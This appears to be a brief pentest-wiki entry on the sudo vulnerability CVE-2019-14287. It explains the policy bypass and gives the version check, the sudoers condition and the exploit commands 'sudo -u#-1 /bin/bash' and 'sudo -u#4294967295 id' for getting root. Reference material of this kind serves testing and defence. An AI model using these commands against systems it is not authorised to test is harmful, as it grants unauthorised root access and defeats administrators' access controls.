User Restriction Bypass
CVE-2019-14287
Theory
The sudo vulnerability CVE-2019-14287 is a security policy bypass issue that provides a user or a program the ability to execute commands as root on a Linux system when the "sudoers configuration" explicitly disallows the root access. Exploiting the vulnerability requires the user to have sudo privileges that allow them to run commands with an arbitrary user ID, except root.
Practice
To exploit, sudo version must be vulnerable (sudo < 1.8.28)
$ sudo -V
Sudo version 1.8.27You must be able to run a command with sudo with an arbitrary user ID, except root
$ sudo -l
[...]
(ALL, !root) ALLIf you have a full TTY, you can exploit it like this
sudo -u#-1 /bin/bash
sudo -u#4294967295 idLast updated
Was this helpful?